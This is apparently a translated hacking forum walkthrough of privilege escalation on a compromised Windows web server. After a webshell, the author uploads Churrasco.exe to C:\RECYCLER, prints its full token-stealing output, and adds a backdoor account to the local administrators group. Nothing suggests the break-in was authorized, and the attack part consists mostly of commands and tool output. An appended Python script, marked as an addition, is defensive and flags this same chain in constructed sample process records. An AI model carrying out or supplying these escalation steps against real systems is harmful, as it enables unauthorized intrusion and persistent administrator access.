After getting the shell, first check which drives are writable; it looks like this shell's permissions are fairly good.
Next, let's see how to escalate privileges.
wscript.shell √ (command-line execution component)
This one is OK and can be used.

A cmd was uploaded, so commands can be executed; before it was uploaded they could not. Let me show everyone.
Now for the main part.
I won't type much more; just watch the operation.
It cannot execute directly, so we need the little tool that was just uploaded:
Churrasco.exe
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 708
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 712
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 716
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 724
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xeec
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found admin$ Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found SYSTEM token 0xee4
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
命令成功完成。
C:\RECYCLER\Churrasco.exe "net localgroup administrators 111 /add"  (promotes the account to administrator)

上次设置密码           2009-1-12 21:20
密码到期               2009-2-24 20:07
密码可更改             2009-1-12 21:20
OK, then connect.
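Added example, not from the original post: a small Python check a defender could run over process-creation records to flag the chain shown above (a binary launched from C:\RECYCLER under NETWORK SERVICE, a child running as SYSTEM, and a command adding an account to the local administrators group). The record field names, the w3wp.exe parent process and all sample events are assumptions constructed for this example.

```python
"""Flag process-creation records matching the escalation chain described
above. SAMPLE_EVENTS is constructed sample data, not real telemetry; the
field names are an assumption, not any particular product's schema."""
import re

# Constructed sample events: pid, parent pid, account, image path, command line.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "user": "NT AUTHORITY\\NETWORK SERVICE",
     "image": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmdline": "w3wp.exe"},
    {"pid": 1300, "ppid": 1200, "user": "NT AUTHORITY\\NETWORK SERVICE",
     "image": r"C:\RECYCLER\Churrasco.exe",
     "cmdline": 'C:\\RECYCLER\\Churrasco.exe "net localgroup administrators 111 /add"'},
    {"pid": 1310, "ppid": 1300, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators 111 /add"},
    {"pid": 1400, "ppid": 900, "user": "NT AUTHORITY\\NETWORK SERVICE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

# Executables started from the Recycle Bin directory used in the write-up.
RECYCLER_RE = re.compile(r"^[A-Z]:\\RECYCLER\\", re.IGNORECASE)
# Any account being added to the local Administrators group via net/net1.
ADMIN_ADD_RE = re.compile(
    r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.IGNORECASE)


def analyze(events):
    """Return (pid, rule) findings; a pid may trigger more than one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if RECYCLER_RE.match(e["image"]):
            findings.append((e["pid"], "exec-from-recycler"))
        if ADMIN_ADD_RE.search(e["cmdline"]):
            findings.append((e["pid"], "local-admin-add"))
        # A SYSTEM child of a NETWORK SERVICE process is the token-stealing
        # jump the churrasco output above describes.
        parent = by_pid.get(e["ppid"])
        if (parent and "NETWORK SERVICE" in parent["user"].upper()
                and e["user"].upper().endswith("\\SYSTEM")):
            findings.append((e["pid"], "networkservice-to-system"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```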